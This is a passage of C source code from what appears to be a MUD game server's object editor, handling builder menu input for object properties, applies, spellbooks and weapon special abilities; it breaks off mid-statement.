switch (OLC_MODE(d)) { case OEDIT_CONFIRM_SAVESTRING: switch (*arg) { case 'y': case 'Y': oedit_save_internally(d); mudlog(CMP, MAX(LVL_BUILDER, GET_INVIS_LEV(d->character)), TRUE, "OLC: %s edits obj %d", GET_NAME(d->character), OLC_NUM(d)); if (CONFIG_OLC_SAVE) { oedit_save_to_disk(real_zone_by_thing(OLC_NUM(d))); write_to_output(d, "Object saved to disk.\r\n"); } else write_to_output(d, "Object saved to memory.\r\n"); cleanup_olc(d, CLEANUP_ALL); return; case 'n': case 'N': /* If not saving, we must free the script_proto list. */ OLC_OBJ(d)->proto_script = OLC_SCRIPT(d); free_proto_script(OLC_OBJ(d), OBJ_TRIGGER); cleanup_olc(d, CLEANUP_ALL); return; case 'a': /* abort quit */ case 'A': oedit_disp_menu(d); return; default: write_to_output(d, "Invalid choice!\r\n"); write_to_output(d, "Do you wish to save your changes? : \r\n"); return; } case OEDIT_MAIN_MENU: /* Throw us out to whichever edit mode based on user input. */ switch (*arg) { case 'q': case 'Q': if (OLC_VAL(d)) { /* Something has been modified. */ write_to_output(d, "Do you wish to save your changes? 
: "); OLC_MODE(d) = OEDIT_CONFIRM_SAVESTRING; } else cleanup_olc(d, CLEANUP_ALL); return; case '1': write_to_output(d, "Enter keywords : "); OLC_MODE(d) = OEDIT_KEYWORD; break; case '2': write_to_output(d, "Enter short desc : "); OLC_MODE(d) = OEDIT_SHORTDESC; break; case '3': write_to_output(d, "Enter long desc :-\r\n| "); OLC_MODE(d) = OEDIT_LONGDESC; break; case '4': OLC_MODE(d) = OEDIT_ACTDESC; send_editor_help(d); write_to_output(d, "Enter action description:\r\n\r\n"); if (OLC_OBJ(d)->action_description) { write_to_output(d, "%s", OLC_OBJ(d)->action_description); oldtext = strdup(OLC_OBJ(d)->action_description); } string_write(d, &OLC_OBJ(d)->action_description, MAX_MESSAGE_LENGTH, 0, oldtext); OLC_VAL(d) = 1; break; case '5': oedit_disp_type_menu(d); OLC_MODE(d) = OEDIT_TYPE; break; //case 'g': //case 'G': //oedit_disp_prof_menu(d); //OLC_MODE(d) = OEDIT_PROF; //break; case 'h': case 'H': oedit_disp_mats_menu(d); OLC_MODE(d) = OEDIT_MATERIAL; break; case '6': oedit_disp_extra_menu(d); OLC_MODE(d) = OEDIT_EXTRAS; break; case '7': oedit_disp_wear_menu(d); OLC_MODE(d) = OEDIT_WEAR; break; case '8': write_to_output(d, "Enter weight : "); OLC_MODE(d) = OEDIT_WEIGHT; break; case 'i': case 'I': oedit_disp_size_menu(d); OLC_MODE(d) = OEDIT_SIZE; break; case '9': write_to_output(d, "Enter cost : "); OLC_MODE(d) = OEDIT_COST; break; case 'a': case 'A': write_to_output(d, "Enter cost per day : "); OLC_MODE(d) = OEDIT_COSTPERDAY; break; case 'b': case 'B': write_to_output(d, "Enter timer : "); OLC_MODE(d) = OEDIT_TIMER; break; case 'c': case 'C': /* Clear any old values */ GET_OBJ_VAL(OLC_OBJ(d), 0) = 0; GET_OBJ_VAL(OLC_OBJ(d), 1) = 0; GET_OBJ_VAL(OLC_OBJ(d), 2) = 0; GET_OBJ_VAL(OLC_OBJ(d), 3) = 0; GET_OBJ_VAL(OLC_OBJ(d), 4) = 0; GET_OBJ_VAL(OLC_OBJ(d), 5) = 0; GET_OBJ_VAL(OLC_OBJ(d), 6) = 0; GET_OBJ_VAL(OLC_OBJ(d), 7) = 0; GET_OBJ_VAL(OLC_OBJ(d), 8) = 0; GET_OBJ_VAL(OLC_OBJ(d), 9) = 0; GET_OBJ_VAL(OLC_OBJ(d), 10) = 0; GET_OBJ_VAL(OLC_OBJ(d), 11) = 0; GET_OBJ_VAL(OLC_OBJ(d), 12) = 0; GET_OBJ_VAL(OLC_OBJ(d), 13) = 0; GET_OBJ_VAL(OLC_OBJ(d), 14) = 0; GET_OBJ_VAL(OLC_OBJ(d), 15) = 0; OLC_VAL(d) = 1; oedit_disp_val1_menu(d); break; case 'd': case 'D': oedit_disp_prompt_apply_menu(d); break; case 'e': case 'E': /* If extra descriptions don't exist. */ if (OLC_OBJ(d)->ex_description == NULL) { CREATE(OLC_OBJ(d)->ex_description, struct extra_descr_data, 1); OLC_OBJ(d)->ex_description->next = NULL; } OLC_DESC(d) = OLC_OBJ(d)->ex_description; oedit_disp_extradesc_menu(d); break; case 'm': case 'M': write_to_output(d, "Enter new minimum level: "); OLC_MODE(d) = OEDIT_LEVEL; break; case 'p': case 'P': oedit_disp_perm_menu(d); OLC_MODE(d) = OEDIT_PERM; break; case 's': case 'S': OLC_SCRIPT_EDIT_MODE(d) = SCRIPT_MAIN_MENU; dg_script_menu(d); return; case 't': case 'T': oedit_disp_prompt_spellbook_menu(d); break; case 'w': case 'W': write_to_output(d, "Copy what object? "); OLC_MODE(d) = OEDIT_COPY; break; case 'x': case 'X': write_to_output(d, "Are you sure you want to delete this object? 
"); OLC_MODE(d) = OEDIT_DELETE; break; case 'f': case 'F': oedit_disp_weapon_spells(d); OLC_MODE(d) = OEDIT_WEAPON_SPELL_MENU; break; case 'j': case 'J': oedit_disp_weapon_special_abilities_menu(d); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; break; default: oedit_disp_menu(d); break; } return; /* end of OEDIT_MAIN_MENU */ case OLC_SCRIPT_EDIT: if (dg_script_edit_parse(d, arg)) return; break; case OEDIT_KEYWORD: if (!genolc_checkstring(d, arg)) break; if (OLC_OBJ(d)->name) free(OLC_OBJ(d)->name); OLC_OBJ(d)->name = str_udup(arg); break; case OEDIT_SHORTDESC: if (!genolc_checkstring(d, arg)) break; if (OLC_OBJ(d)->short_description) free(OLC_OBJ(d)->short_description); OLC_OBJ(d)->short_description = str_udup(arg); break; case OEDIT_LONGDESC: if (!genolc_checkstring(d, arg)) break; if (OLC_OBJ(d)->description) free(OLC_OBJ(d)->description); OLC_OBJ(d)->description = str_udup(arg); break; case OEDIT_TYPE: number = atoi(arg); if ((number < 0) || (number >= NUM_ITEM_TYPES)) { write_to_output(d, "Invalid choice, try again : "); return; } else GET_OBJ_TYPE(OLC_OBJ(d)) = number; /* what's the boundschecking worth if we don't do this ? -- Welcor */ GET_OBJ_VAL(OLC_OBJ(d), 0) = GET_OBJ_VAL(OLC_OBJ(d), 1) = GET_OBJ_VAL(OLC_OBJ(d), 2) = GET_OBJ_VAL(OLC_OBJ(d), 3) = 0; break; case OEDIT_PROF: number = atoi(arg); if ((number < 0) || (number >= NUM_ITEM_PROFS)) { write_to_output(d, "Invalid choice, try again : "); return; } else GET_OBJ_PROF(OLC_OBJ(d)) = number; break; case OEDIT_MATERIAL: number = atoi(arg); if ((number < 1) || (number >= NUM_MATERIALS)) { write_to_output(d, "Invalid choice, try again : "); return; } else GET_OBJ_MATERIAL(OLC_OBJ(d)) = number; break; case OEDIT_EXTRAS: number = atoi(arg); if ((number < 0) || (number > NUM_ITEM_FLAGS)) { oedit_disp_extra_menu(d); return; } else if (number == 0) break; else { TOGGLE_BIT_AR(GET_OBJ_EXTRA(OLC_OBJ(d)), (number - 1)); oedit_disp_extra_menu(d); return; } case OEDIT_WEAR: number = atoi(arg); if ((number < 0) || (number > NUM_ITEM_WEARS)) { write_to_output(d, "That's not a valid choice!\r\n"); oedit_disp_wear_menu(d); return; } else if (number == 0) /* Quit. */ break; else { TOGGLE_BIT_AR(GET_OBJ_WEAR(OLC_OBJ(d)), (number - 1)); oedit_disp_wear_menu(d); return; } case OEDIT_WEIGHT: GET_OBJ_WEIGHT(OLC_OBJ(d)) = LIMIT(atoi(arg), 0, MAX_OBJ_WEIGHT); break; case OEDIT_SIZE: number = atoi(arg) - 1; GET_OBJ_SIZE(OLC_OBJ(d)) = LIMIT(number, 0, NUM_SIZES - 1); break; case OEDIT_COST: GET_OBJ_COST(OLC_OBJ(d)) = LIMIT(atoi(arg), 0, MAX_OBJ_COST); break; case OEDIT_COSTPERDAY: GET_OBJ_RENT(OLC_OBJ(d)) = LIMIT(atoi(arg), 0, MAX_OBJ_RENT); break; case OEDIT_TIMER: GET_OBJ_TIMER(OLC_OBJ(d)) = LIMIT(atoi(arg), 0, MAX_OBJ_TIMER); break; case OEDIT_LEVEL: GET_OBJ_LEVEL(OLC_OBJ(d)) = LIMIT(atoi(arg), 0, LVL_IMPL); break; case OEDIT_PERM: if ((number = atoi(arg)) == 0) break; if (number > 0 && number <= NUM_AFF_FLAGS) { /* Setting AFF_CHARM on objects like this is dangerous. 
*/ if (number != AFF_CHARM) { TOGGLE_BIT_AR(GET_OBJ_PERM(OLC_OBJ(d)), number); } } oedit_disp_perm_menu(d); return; case OEDIT_VALUE_1: number = atoi(arg); switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_INSTRUMENT: GET_OBJ_VAL(OLC_OBJ(d), 0) = MIN(MAX(atoi(arg), 0), MAX_INSTRUMENTS - 1); break; case ITEM_SWITCH: GET_OBJ_VAL(OLC_OBJ(d), 0) = MIN(MAX(atoi(arg), 0), 1); break; case ITEM_FURNITURE: if (number < 0 || number > MAX_PEOPLE) oedit_disp_val1_menu(d); else { GET_OBJ_VAL(OLC_OBJ(d), 0) = number; oedit_disp_val2_menu(d); } break; /* val[0] is AC from old system setup */ /* ITEM_ARMOR */ case ITEM_WEAPON: /* function from treasure.c */ set_weapon_object(OLC_OBJ(d), MIN(MAX(atoi(arg), 0), NUM_WEAPON_TYPES - 1)); /* Skip a few. */ oedit_disp_val5_menu(d); return; case ITEM_TREASURE_CHEST: if (atoi(arg) <= LOOTBOX_LEVEL_UNDEFINED || atoi(arg) >= NUM_LOOTBOX_LEVELS) { write_to_output(d, "Invalid option. Try again: "); return; } GET_OBJ_VAL(OLC_OBJ(d), 0) = atoi(arg); oedit_disp_val2_menu(d); return; case ITEM_FIREWEAPON: GET_OBJ_VAL(OLC_OBJ(d), 0) = MIN(MAX(atoi(arg), 0), NUM_RANGED_WEAPONS - 1); break; case ITEM_MISSILE: GET_OBJ_VAL(OLC_OBJ(d), 0) = LIMIT(atoi(arg), 1, NUM_AMMO_TYPES - 1); /* jump to break probability */ oedit_disp_val3_menu(d); return; case ITEM_CONTAINER: case ITEM_AMMO_POUCH: GET_OBJ_VAL(OLC_OBJ(d), 0) = LIMIT(atoi(arg), -1, MAX_CONTAINER_SIZE); break; /* NewCraft */ case ITEM_BLUEPRINT: GET_OBJ_VAL(OLC_OBJ(d), 0) = LIMIT(atoi(arg), 0, 1000); break; /* special values for worn gear, example monk-gloves will apply an enhancement bonus to damage */ case ITEM_WORN: GET_OBJ_VAL(OLC_OBJ(d), 0) = LIMIT(atoi(arg), 1, 10); break; default: GET_OBJ_VAL(OLC_OBJ(d), 0) = atoi(arg); } /* proceed to menu 2 */ oedit_disp_val2_menu(d); return; case OEDIT_VALUE_2: /* Here, I do need to check for out of range values. */ number = atoi(arg); switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_INSTRUMENT: /* reduce difficulty */ GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 0, 30); oedit_disp_val3_menu(d); break; case ITEM_TREASURE_CHEST: if (atoi(arg) <= LOOTBOX_TYPE_UNDEFINED || atoi(arg) >= NUM_LOOTBOX_TYPES) { write_to_output(d, "Invalid option. Try again: "); return; } GET_OBJ_VAL(OLC_OBJ(d), 1) = atoi(arg); oedit_disp_val3_menu(d); break; case ITEM_SCROLL: case ITEM_POTION: if (number == 0 || number == -1) GET_OBJ_VAL(OLC_OBJ(d), 1) = -1; else GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 1, NUM_SPELLS); oedit_disp_val3_menu(d); break; case ITEM_CONTAINER: case ITEM_AMMO_POUCH: /* Needs some special handling since we are dealing with flag values here. */ if (number < 0 || number > 4) oedit_disp_container_flags_menu(d); else if (number != 0) { TOGGLE_BIT(GET_OBJ_VAL(OLC_OBJ(d), 1), 1 << (number - 1)); OLC_VAL(d) = 1; oedit_disp_val2_menu(d); } else oedit_disp_val3_menu(d); break; case ITEM_WEAPON: GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 1, MAX_WEAPON_NDICE); oedit_disp_val3_menu(d); break; case ITEM_ARMOR: /* val[0] is AC from old system setup */ /* from treasure.c - auto set some values of this item now! */ set_armor_object(OLC_OBJ(d), MIN(MAX(atoi(arg), 0), NUM_SPEC_ARMOR_TYPES - 1)); /* Skip to enhancement menu. */ oedit_disp_val5_menu(d); return; case ITEM_FIREWEAPON: GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 1, MAX_WEAPON_NDICE); oedit_disp_val3_menu(d); break; case ITEM_MISSILE: //GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 1, MAX_WEAPON_SDICE); /* Skip to enhancement menu. 
*/ //oedit_disp_val5_menu(d); //return; break; case ITEM_CLANARMOR: GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 1, num_of_clans); oedit_disp_val3_menu(d); break; case ITEM_SWITCH: GET_OBJ_VAL(OLC_OBJ(d), 1) = LIMIT(number, 1, 999999); ; oedit_disp_val3_menu(d); break; default: GET_OBJ_VAL(OLC_OBJ(d), 1) = number; oedit_disp_val3_menu(d); } return; case OEDIT_VALUE_3: number = atoi(arg); /* Quick'n'easy error checking. */ switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_SCROLL: case ITEM_POTION: if (number == 0 || number == -1) { GET_OBJ_VAL(OLC_OBJ(d), 2) = -1; oedit_disp_val4_menu(d); return; } min_val = 1; max_val = NUM_SPELLS; break; case ITEM_INSTRUMENT: /* instrument level */ min_val = 0; max_val = 10; break; case ITEM_WEAPON: min_val = 1; max_val = MAX_WEAPON_SDICE; break; case ITEM_FIREWEAPON: min_val = 2; max_val = 98; break; case ITEM_MISSILE: /* break probability */ min_val = 2; max_val = 98; GET_OBJ_VAL(OLC_OBJ(d), 2) = LIMIT(number, min_val, max_val); /* jump to enhancement bonus */ oedit_disp_val5_menu(d); return; case ITEM_WAND: case ITEM_STAFF: min_val = 0; max_val = 20; break; case ITEM_DRINKCON: case ITEM_FOUNTAIN: min_val = 0; max_val = NUM_LIQ_TYPES - 1; number--; break; case ITEM_KEY: min_val = 0; max_val = 400000000; break; case ITEM_PORTAL: min_val = 1; max_val = 400000000; break; case ITEM_SWITCH: min_val = 0; max_val = 5; break; default: min_val = -200000000; max_val = 200000000; } GET_OBJ_VAL(OLC_OBJ(d), 2) = LIMIT(number, min_val, max_val); oedit_disp_val4_menu(d); return; case OEDIT_VALUE_4: number = atoi(arg); switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_SCROLL: case ITEM_POTION: if (number == 0 || number == -1) { GET_OBJ_VAL(OLC_OBJ(d), 3) = -1; oedit_disp_menu(d); return; } min_val = 1; max_val = NUM_SPELLS; break; case ITEM_WAND: case ITEM_STAFF: min_val = 1; max_val = NUM_SPELLS; break; case ITEM_INSTRUMENT: /* breakability: 0 = indestructable, 2000 = break on first use * recommended values are 0-30 */ min_val = 0; max_val = 2000; break; case ITEM_WEAPON: min_val = 0; max_val = NUM_ATTACK_TYPES - 1; break; case ITEM_FIREWEAPON: min_val = 0; max_val = NUM_ATTACK_TYPES - 1; break; case ITEM_SWITCH: GET_OBJ_VAL(OLC_OBJ(d), 3) = LIMIT(number, 0, 2); oedit_disp_menu(d); return; /* case ITEM_MISSILE: min_val = 0; max_val = NUM_ATTACK_TYPES - 1; break;*/ default: min_val = -65000; max_val = 65000; break; } GET_OBJ_VAL(OLC_OBJ(d), 3) = LIMIT(number, min_val, max_val); oedit_disp_val5_menu(d); return; /*this is enhancement bonus so far*/ case OEDIT_VALUE_5: number = atoi(arg); switch (GET_OBJ_TYPE(OLC_OBJ(d))) { case ITEM_MISSILE: min_val = 0; max_val = 10; break; case ITEM_WEAPON: min_val = 0; max_val = 10; break; case ITEM_ARMOR: case ITEM_CLANARMOR: min_val = 0; max_val = 10; break; default: min_val = -65000; max_val = 65000; break; } GET_OBJ_VAL(OLC_OBJ(d), 4) = LIMIT(number, min_val, max_val); break; // } // } case OEDIT_PROMPT_APPLY: if ((number = atoi(arg)) == 0) break; else if (number < 0 || number > MAX_OBJ_AFFECT) { oedit_disp_prompt_apply_menu(d); return; } OLC_VAL(d) = number - 1; OLC_MODE(d) = OEDIT_APPLY; oedit_disp_apply_menu(d); return; case OEDIT_APPLY: if (((number = atoi(arg)) == 0) || ((number = atoi(arg)) == 1)) { OLC_OBJ(d)->affected[OLC_VAL(d)].location = 0; OLC_OBJ(d)->affected[OLC_VAL(d)].modifier = 0; oedit_disp_prompt_apply_menu(d); } else if (number < 0 || number > NUM_APPLIES) oedit_disp_apply_menu(d); else { int counter; /* add in check here if already applied.. 
deny builders another */ if (GET_LEVEL(d->character) < LVL_IMPL) { for (counter = 0; counter < MAX_OBJ_AFFECT; counter++) { if (OLC_OBJ(d)->affected[counter].location == number) { write_to_output(d, "Object already has that apply."); return; } } } OLC_OBJ(d)->affected[OLC_VAL(d)].location = number - 1; write_to_output(d, "Modifier : "); OLC_MODE(d) = OEDIT_APPLYMOD; } return; case OEDIT_APPLYMOD: OLC_OBJ(d)->affected[OLC_VAL(d)].modifier = atoi(arg); oedit_disp_apply_prompt_bonus_type_menu(d); return; case OEDIT_APPLYSPEC: if (isdigit(*arg)) OLC_OBJ(d)->affected[OLC_VAL(d)].modifier = atoi(arg); else switch (OLC_OBJ(d)->affected[OLC_VAL(d)].location) { /* case APPLY_SKILL: number = find_skill_num(arg, SKTYPE_SKILL); if (number > -1) OLC_OBJ(d)->affected[OLC_VAL(d)].specific = number; break; */ case APPLY_FEAT: number = find_feat_num(arg); if (number > -1) OLC_OBJ(d)->affected[OLC_VAL(d)].modifier = number; break; default: OLC_OBJ(d)->affected[OLC_VAL(d)].modifier = 0; break; } oedit_disp_apply_prompt_bonus_type_menu(d); return; case OEDIT_APPLY_BONUS_TYPE: number = atoi(arg); if (number < 0 || number > NUM_BONUS_TYPES) { write_to_output(d, "Invalid bonus type, please enter a valid bonus type."); oedit_disp_apply_prompt_bonus_type_menu(d); return; } OLC_OBJ(d)->affected[OLC_VAL(d)].bonus_type = atoi(arg); oedit_disp_prompt_apply_menu(d); return; case OEDIT_EXTRADESC_KEY: if (genolc_checkstring(d, arg)) { if (OLC_DESC(d)->keyword) free(OLC_DESC(d)->keyword); OLC_DESC(d)->keyword = str_udup(arg); } oedit_disp_extradesc_menu(d); return; case OEDIT_EXTRADESC_MENU: switch ((number = atoi(arg))) { case 0: if (!OLC_DESC(d)->keyword || !OLC_DESC(d)->description) { struct extra_descr_data *temp; if (OLC_DESC(d)->keyword) free(OLC_DESC(d)->keyword); if (OLC_DESC(d)->description) free(OLC_DESC(d)->description); /* Clean up pointers */ REMOVE_FROM_LIST(OLC_DESC(d), OLC_OBJ(d)->ex_description, next); free(OLC_DESC(d)); OLC_DESC(d) = NULL; } break; case 1: OLC_MODE(d) = OEDIT_EXTRADESC_KEY; write_to_output(d, "Enter keywords, separated by spaces :-\r\n| "); return; case 2: OLC_MODE(d) = OEDIT_EXTRADESC_DESCRIPTION; send_editor_help(d); write_to_output(d, "Enter the extra description:\r\n\r\n"); if (OLC_DESC(d)->description) { write_to_output(d, "%s", OLC_DESC(d)->description); oldtext = strdup(OLC_DESC(d)->description); } string_write(d, &OLC_DESC(d)->description, MAX_MESSAGE_LENGTH, 0, oldtext); OLC_VAL(d) = 1; return; case 3: /* Only go to the next description if this one is finished. */ if (OLC_DESC(d)->keyword && OLC_DESC(d)->description) { struct extra_descr_data *new_extra; if (OLC_DESC(d)->next) OLC_DESC(d) = OLC_DESC(d)->next; else { /* Make new extra description and attach at end. */ CREATE(new_extra, struct extra_descr_data, 1); OLC_DESC(d)->next = new_extra; OLC_DESC(d) = OLC_DESC(d)->next; } } /* No break - drop into default case. 
*/ default: oedit_disp_extradesc_menu(d); return; } break; case OEDIT_COPY: if ((number = real_object(atoi(arg))) != NOTHING) { oedit_setup_existing(d, number); } else write_to_output(d, "That object does not exist.\r\n"); break; case OEDIT_DELETE: if (*arg == 'y' || *arg == 'Y') { if (delete_object(GET_OBJ_RNUM(OLC_OBJ(d))) != NOTHING) write_to_output(d, "Object deleted.\r\n"); else write_to_output(d, "Couldn't delete the object!\r\n"); cleanup_olc(d, CLEANUP_ALL); } else if (*arg == 'n' || *arg == 'N') { oedit_disp_menu(d); OLC_MODE(d) = OEDIT_MAIN_MENU; } else write_to_output(d, "Please answer 'Y' or 'N': "); return; case OEDIT_WEAPON_SPELL_MENU: if ((number = atoi(arg)) == -1) break; else if (number < 1 || number > MAX_WEAPON_SPELLS) { OLC_MODE(d) = OEDIT_MAIN_MENU; oedit_disp_menu(d); return; } OLC_VAL(d) = number - 1; OLC_MODE(d) = OEDIT_WEAPON_SPELLS; oedit_disp_spells_menu(d); return; case OEDIT_WEAPON_SPELLS: if ((number = atoi(arg)) == -1) break; else if (number < -1 || number > MAX_SPELLS) { oedit_disp_spells_menu(d); return; } OLC_OBJ(d)->wpn_spells[OLC_VAL(d)].spellnum = number; OLC_MODE(d) = OEDIT_WEAPON_SPELL_LEVEL; send_to_char(d->character, "At what level should it be cast: "); return; case OEDIT_WEAPON_SPELL_LEVEL: if ((number = atoi(arg)) == -1) break; if (number < 1) { send_to_char(d->character, "Invalid level.\r\n"); send_to_char(d->character, "What level should the spell be cast at: "); return; } OLC_OBJ(d)->wpn_spells[OLC_VAL(d)].level = number; send_to_char(d->character, "What percent of rounds should it go off: "); OLC_MODE(d) = OEDIT_WEAPON_SPELL_PERCENT; return; case OEDIT_WEAPON_SPELL_PERCENT: if ((number = atoi(arg)) == -1) break; if (number < 1 || number > 50) { send_to_char(d->character, "Invalid percent, must be 1-50.\r\nPlease enter the percent: "); return; } OLC_OBJ(d)->wpn_spells[OLC_VAL(d)].percent = number; OLC_OBJ(d)->has_spells = TRUE; send_to_char(d->character, "1 for offensive, 0 for defensive spell: "); OLC_MODE(d) = OEDIT_WEAPON_SPELL_INCOMBAT; return; case OEDIT_WEAPON_SPELL_INCOMBAT: if ((number = atoi(arg)) == -1) break; if (number != 1 && number != 0) { send_to_char(d->character, "Invalid value!\r\n"); send_to_char(d->character, "1 = on = Spell will cast in combat exclusively (offensive)\r\n"); send_to_char(d->character, "0 = off = Spell will cast randomly (defensive)\r\n"); return; } OLC_OBJ(d)->wpn_spells[OLC_VAL(d)].inCombat = number; /* Got the last of it, now go back in case of more */ OLC_MODE(d) = OEDIT_WEAPON_SPELL_MENU; oedit_disp_weapon_spells(d); return; case OEDIT_PROMPT_SPELLBOOK: if ((number = atoi(arg)) == 0) break; else if (number < 0 || number > SPELLBOOK_SIZE) { oedit_disp_prompt_spellbook_menu(d); return; } int counter; if (!OLC_OBJ(d)->sbinfo) { CREATE(OLC_OBJ(d)->sbinfo, struct obj_spellbook_spell, SPELLBOOK_SIZE); memset((char *)OLC_OBJ(d)->sbinfo, 0, SPELLBOOK_SIZE * sizeof(struct obj_spellbook_spell)); } /* look for empty spot in book */ for (counter = 0; counter < SPELLBOOK_SIZE; counter++) if (OLC_OBJ(d)->sbinfo && OLC_OBJ(d)->sbinfo[counter].spellname == 0) break; /* oops no space */ if (OLC_OBJ(d)->sbinfo && counter == SPELLBOOK_SIZE) { write_to_output(d, "This spellbook is full!\r\n"); return; } OLC_VAL(d) = counter; OLC_MODE(d) = OEDIT_SPELLBOOK; oedit_disp_spellbook_menu(d); return; case OEDIT_SPELLBOOK: if ((number = atoi(arg)) == 0) { if (OLC_OBJ(d)->sbinfo) { OLC_OBJ(d)->sbinfo[OLC_VAL(d)].spellname = 0; OLC_OBJ(d)->sbinfo[OLC_VAL(d)].pages = 0; } else { CREATE(OLC_OBJ(d)->sbinfo, struct obj_spellbook_spell, 
SPELLBOOK_SIZE); memset((char *)OLC_OBJ(d)->sbinfo, 0, SPELLBOOK_SIZE * sizeof(struct obj_spellbook_spell)); OLC_OBJ(d)->sbinfo[OLC_VAL(d)].spellname = 0; OLC_OBJ(d)->sbinfo[OLC_VAL(d)].pages = 0; } oedit_disp_prompt_spellbook_menu(d); } else if (number < 0 || number >= NUM_SPELLS) { oedit_disp_spellbook_menu(d); } else { int counter; /* add in check here if already applied.. deny builders another */ for (counter = 0; counter < SPELLBOOK_SIZE; counter++) { if (OLC_OBJ(d)->sbinfo && OLC_OBJ(d)->sbinfo[counter].spellname == number) { write_to_output(d, "Object already has that spell."); return; } } if (!OLC_OBJ(d)->sbinfo) { CREATE(OLC_OBJ(d)->sbinfo, struct obj_spellbook_spell, SPELLBOOK_SIZE); memset((char *)OLC_OBJ(d)->sbinfo, 0, SPELLBOOK_SIZE * sizeof(struct obj_spellbook_spell)); } OLC_OBJ(d)->sbinfo[OLC_VAL(d)].spellname = number; OLC_OBJ(d)->sbinfo[OLC_VAL(d)].pages = MAX(1, lowest_spell_level(number) / 2); ; oedit_disp_prompt_spellbook_menu(d); } return; case OEDIT_WEAPON_SPECAB_MENU: switch (*arg) { case 'N': case 'n': /* Create a new special ability and assign it to the list. */ CREATE(OLC_SPECAB(d), struct obj_special_ability, 1); OLC_SPECAB(d)->next = OLC_OBJ(d)->special_abilities; OLC_OBJ(d)->special_abilities = OLC_SPECAB(d); OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; OLC_VAL(d) = 1; oedit_disp_assign_weapon_specab_menu(d); break; case 'E': case 'e': write_to_output(d, "Edit which ability? : "); OLC_MODE(d) = OEDIT_EDIT_WEAPON_SPECAB; OLC_VAL(d) = 1; break; case 'D': case 'd': write_to_output(d, "Delete which ability? (-1 to cancel) : "); OLC_MODE(d) = OEDIT_DELETE_WEAPON_SPECAB; break; case 'Q': case 'q': OLC_MODE(d) = OEDIT_MAIN_MENU; oedit_disp_menu(d); break; default: write_to_output(d, "Invalid choice, try again : \r\n"); break; } return; case OEDIT_EDIT_WEAPON_SPECAB: /* Editing is the same as assign - just load the chosen specab. */ number = atoi(arg); OLC_SPECAB(d) = get_specab_by_position(OLC_OBJ(d), number); if (OLC_SPECAB(d) == NULL) { write_to_output(d, "Invalid special ability number. \r\n"); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; oedit_disp_weapon_special_abilities_menu(d); } else { OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); } return; case OEDIT_ASSIGN_WEAPON_SPECAB_MENU: switch (*arg) { case 'A': case 'a': /* Choose ability. 
*/ oedit_weapon_specab(d); break; case 'L': case 'l': /* Set ability level */ write_to_output(d, "Enter special ability level (1-34) : "); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_LEVEL; OLC_VAL(d) = 1; break; case 'M': case 'm': /* Set activation methods */ oedit_disp_specab_activation_method_menu(d); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_ACTMTD; OLC_VAL(d) = 1; break; case 'C': case 'c': /* Set command word */ write_to_output(d, "Enter command word : "); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_CMDWD; OLC_VAL(d) = 1; break; case 'V': case 'v': /* Go into value setting questions */ oedit_disp_specab_val1_menu(d); OLC_VAL(d) = 1; break; case 'Q': case 'q': OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; oedit_disp_weapon_special_abilities_menu(d); break; default: write_to_output(d, "Invalid choice, try again : \r\n"); break; } return; case OEDIT_DELETE_WEAPON_SPECAB: if ((number = atoi(arg)) == -1) { oedit_disp_weapon_special_abilities_menu(d); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; OLC_VAL(d) = 1; return; } OLC_SPECAB(d) = NULL; if (remove_special_ability(OLC_OBJ(d), number)) write_to_output(d, "Ability deleted.\r\n"); else write_to_output(d, "That ability does not exist!\r\n"); oedit_disp_weapon_special_abilities_menu(d); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; return; case OEDIT_WEAPON_SPECAB: /* The user has chosen a special ability for this weapon. */ number = atoi(arg); /* No need to decrement number, we adjusted it already. */ if ((number < 0) || (number >= NUM_SPECABS)) { write_to_output(d, "Invalid choice, try again : "); return; } OLC_SPECAB(d)->ability = number; OLC_SPECAB(d)->level = special_ability_info[number].level; OLC_SPECAB(d)->activation_method = special_ability_info[number].activation_method; OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); return; case OEDIT_WEAPON_SPECAB_LEVEL: number = atoi(arg); if ((number < 1) || (number > 34)) { write_to_output(d, "Invalid level, try again : "); return; } OLC_SPECAB(d)->level = number; oedit_disp_weapon_special_abilities_menu(d); OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; return; case OEDIT_WEAPON_SPECAB_CMDWD: OLC_SPECAB(d)->command_word = strdup(arg); OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); return; case OEDIT_WEAPON_SPECAB_ACTMTD: number = atoi(arg); if ((number < 0) || (number > NUM_ACTIVATION_METHODS)) { // added -3 to prevent eyes, ears, badge write_to_output(d, "That's not a valid choice!\r\n"); oedit_disp_specab_activation_method_menu(d); return; } else if (number == 0) { /* Quit. */ OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); return; } else { TOGGLE_BIT(OLC_SPECAB(d)->activation_method, (1 << (number - 1))); oedit_disp_specab_activation_method_menu(d); return; } case OEDIT_SPECAB_VALUE_1: switch (OLC_SPECAB(d)->ability) { case WEAPON_SPECAB_BANE: /* Val 1: NPC RACE */ number = atoi(arg); if ((number < 0) || (number >= NUM_RACE_TYPES)) { /* Value out of range. */ write_to_output(d, "Invalid choice, try again : "); return; } OLC_SPECAB(d)->value[0] = number; OLC_MODE(d) 